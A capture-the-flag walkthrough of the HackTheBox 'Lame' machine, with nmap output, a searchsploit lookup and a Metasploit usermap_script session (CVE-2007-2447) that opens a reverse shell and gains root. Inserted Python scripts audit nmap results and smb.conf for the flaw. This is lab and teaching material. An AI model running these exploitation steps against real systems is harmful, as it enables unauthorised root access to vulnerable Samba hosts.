In this walkthrough we go through the Lame room from HackTheBox. The room is rated Easy on the platform and comes down to exploiting a vulnerable Samba version to get root. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | Lame |
| IP address | 10.10.10.3 |
| Difficulty | Easy |
| OS | Linux |
| Description | Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement. |
Enumeration:
- I started off with an nmap scan of the target IP with the aggressive flag (-A) set and found four open ports: 21 (FTP), 22 (SSH), 139 and 445 (Samba).
```
$ sudo nmap -A 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.25s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| vulners:
|   cpe:/a:vsftpd:vsftpd:2.3.4:
|     PRION:CVE-2011-2523        10.0  https://vulners.com/prion/PRION:CVE-2011-2523
|     EDB-ID:49757               10.0  https://vulners.com/exploitdb/EDB-ID:49757  *EXPLOIT*
|_    1337DAY-ID-36095           10.0  https://vulners.com/zdt/1337DAY-ID-36095  *EXPLOIT*
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners:
|   cpe:/a:openbsd:openssh:4.7p1:
|     SSV:78173                  7.8   https://vulners.com/seebug/SSV:78173  *EXPLOIT*
|     SSV:69983                  7.8   https://vulners.com/seebug/SSV:69983  *EXPLOIT*
|     EDB-ID:24450               7.8   https://vulners.com/exploitdb/EDB-ID:24450  *EXPLOIT*
|     EDB-ID:15215               7.8   https://vulners.com/exploitdb/EDB-ID:15215  *EXPLOIT*
|     SECURITYVULNS:VULN:8166    7.5   https://vulners.com/securityvulns/SECURITYVULNS:VULN:8166
|     PRION:CVE-2010-4478        7.5   https://vulners.com/prion/PRION:CVE-2010-4478
|     SSV:20512                  7.2   https://vulners.com/seebug/SSV:20512  *EXPLOIT*
|     PRION:CVE-2011-1013        7.2   https://vulners.com/prion/PRION:CVE-2011-1013
|     PRION:CVE-2008-1657        6.5   https://vulners.com/prion/PRION:CVE-2008-1657
|     CVE-2008-1657              6.5   https://vulners.com/cve/CVE-2008-1657
|     SSV:60656                  5.0   https://vulners.com/seebug/SSV:60656  *EXPLOIT*
|     PRION:CVE-2011-2168        5.0   https://vulners.com/prion/PRION:CVE-2011-2168
|     PRION:CVE-2010-5107        5.0   https://vulners.com/prion/PRION:CVE-2010-5107
|     CVE-2010-5107              5.0   https://vulners.com/cve/CVE-2010-5107
|     PRION:CVE-2010-4755        4.0   https://vulners.com/prion/PRION:CVE-2010-4755
|     PRION:CVE-2010-4754        4.0   https://vulners.com/prion/PRION:CVE-2010-4754
|     PRION:CVE-2012-0814        3.5   https://vulners.com/prion/PRION:CVE-2012-0814
|     PRION:CVE-2011-5000        3.5   https://vulners.com/prion/PRION:CVE-2011-5000
|     CVE-2011-5000              3.5   https://vulners.com/cve/CVE-2011-5000
|     CVE-2008-5161              2.6   https://vulners.com/cve/CVE-2008-5161
|     PRION:CVE-2011-4327        2.1   https://vulners.com/prion/PRION:CVE-2011-4327
|     CVE-2011-4327              2.1   https://vulners.com/cve/CVE-2011-4327
|     PRION:CVE-2008-3259        1.2   https://vulners.com/prion/PRION:CVE-2008-3259
|     CVE-2008-3259              1.2   https://vulners.com/cve/CVE-2008-3259
|_    SECURITYVULNS:VULN:9455    0.0   https://vulners.com/securityvulns/SECURITYVULNS:VULN:9455
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%), LifeSize video conferencing system (Linux 2.4.21) (92%), DD-WRT v24-sp1 (Linux 2.4.36) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   248.70 ms 10.10.14.1
2   250.07 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.65 seconds
```
- I looked up the vsftpd version in searchsploit for known exploits and found the famous backdoor vulnerability, which also has a Metasploit module.
```
searchsploit vsftpd 2.3.4
```
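The scan above is also the input a defender would triage. As an added example (not code from the original post), the script below parses nmap's normal-output port table and flags the two version strings this walkthrough turns on: the backdoored vsftpd 2.3.4 build (CVE-2011-2523, as the vulners output lists it) and Samba 3.0.x builds in the CVE-2007-2447 range. The sample table is constructed from the scan above; because nmap only reported Samba as "3.X - 4.X", the line showing a resolved 3.0.20 build is constructed as well, and the triage separately calls out the coarse "3.X" range as unresolved rather than silently passing it.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port table from the nmap scan above, plus one
# constructed line showing how the same host reports once the exact Samba
# build is known (the scan itself only said "3.X - 4.X").
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# One nmap normal-output port line: "<port>/<proto> <state> <service> <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap_ports(text):
    """Return the port table of an nmap normal-output scan as Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], m["version"].strip()))
    return services


def samba_3_0_vulnerable(version):
    """CVE-2007-2447 affects Samba 3.0.0 through 3.0.25rc3; 3.0.25 final is fixed."""
    m = re.search(r"\bSamba smbd 3\.0\.(\d+)(rc\d+)?", version)
    if not m:
        return False
    minor, rc = int(m.group(1)), m.group(2)
    return minor < 25 or (minor == 25 and rc is not None)


def triage(services):
    """Map each service to (port, finding) pairs worth a ticket, in port order."""
    findings = []
    for svc in services:
        if re.search(r"\bvsftpd 2\.3\.4\b", svc.version):
            findings.append((svc.port, "CVE-2011-2523: vsftpd 2.3.4 backdoored build; replace the package"))
        if samba_3_0_vulnerable(svc.version):
            findings.append((svc.port, "CVE-2007-2447: Samba 3.0.x username map script injection; upgrade to 3.0.25 or later"))
        elif re.search(r"Samba smbd \d\.X", svc.version):
            # nmap's banner match is too coarse to accept or dismiss; needs a real version probe
            findings.append((svc.port, "Samba version range too coarse to assess; confirm the exact build before closing"))
    return findings


if __name__ == "__main__":
    for port, note in triage(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}/tcp  {note}")
```

The "too coarse" finding is the practical point: nmap's service match on 139/445 does not by itself prove or disprove the Samba issue, which is why the write-up had to establish the exact 3.0.20 build separately before the right exploit became obvious.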
Exploitation:
- Next, I tried that Metasploit exploit against the target, but it failed.
- At this point I fell into a rabbit hole and enumerated very deeply without finding any low-hanging fruit for initial access. I then checked the Samba version, 3.0.20, and found that it was vulnerable to CVE-2007-2447. I used the Metasploit exploit for that CVE and got a root shell.
```
$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > search CVE-2007-2447
msf6 > use 0
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Command shell session 1 opened (10.10.14.2:4444 -> 10.10.10.3:35378) at 2023-12-01 12:56:19 +0530
id
uid=0(root) gid=0(root)
```
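The module name, usermap_script, points at the root cause: on Samba 3.0.0 through 3.0.25rc3, smbd handed client-supplied usernames to the program named by the smb.conf option `username map script` through a shell, so shell metacharacters in the name became command execution (CVE-2007-2447). The fix was to upgrade to 3.0.25 or later, and the immediate mitigation was to stop using that option. As an added example (not part of the original write-up), the following audit reads an smb.conf and a Samba version string and reports whether a host is exposed. The two configuration fragments and the script path in them are constructed for illustration.

```python
import re

# Constructed sample smb.conf fragments for the audit below. The first
# carries the "username map script" hook that CVE-2007-2447 abuses; the
# second maps names through a static file instead, which is not affected.
VULNERABLE_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = %h server (Samba, Ubuntu)
    security = user
    ; dynamic name mapping through an external program
    username map script = /etc/samba/scripts/mapusers.sh

[tmp]
    path = /tmp
    writable = yes
"""

HARDENED_SMB_CONF = """\
[global]
    workgroup = WORKGROUP
    server string = %h server (Samba, Ubuntu)
    security = user
    # static mapping file, no external program involved
    username map = /etc/samba/smbusers
"""


def parse_smb_conf(text):
    """Minimal smb.conf reader: [section] headers, 'key = value' lines, # and ; comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        # Samba treats parameter names case-insensitively and ignores extra spaces
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def version_in_cve_2007_2447_range(version):
    """Affected: Samba 3.0.0 through 3.0.25rc3. 3.0.25 final and later are fixed."""
    m = re.match(r"3\.0\.(\d+)(rc\d+)?", version.strip())
    if not m:
        return False
    minor, rc = int(m.group(1)), m.group(2)
    return minor < 25 or (minor == 25 and rc is not None)


def audit_usermap_script(conf_text, samba_version):
    """Return findings as (severity, message) tuples; an empty list means nothing to report."""
    conf = parse_smb_conf(conf_text)
    script = conf.get("global", {}).get("username map script")
    if not script:
        return []
    if version_in_cve_2007_2447_range(samba_version):
        return [("CRITICAL",
                 f"username map script = {script} on Samba {samba_version}: "
                 "remotely exploitable (CVE-2007-2447); remove the option or upgrade to 3.0.25 or later")]
    return [("INFO",
             f"username map script = {script} on Samba {samba_version}: "
             "outside the CVE-2007-2447 range, but client-supplied names still reach an external program")]


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(name, audit_usermap_script(conf, "3.0.20") or "no findings")
```

Run against the same 3.0.20 build the box reports, the first fragment produces a CRITICAL finding and the second produces none, which is the whole difference between Lame and a patched host of the same era.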
Getting Flags:
- Captured the user and root flags and completed the room.
Conclusion:
So that was "Lame" for you. We started off with a regular aggressive nmap scan and found Samba version 3.0.20 running on the target. We checked Metasploit for a known exploit, found one, fired it at the target and got root. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".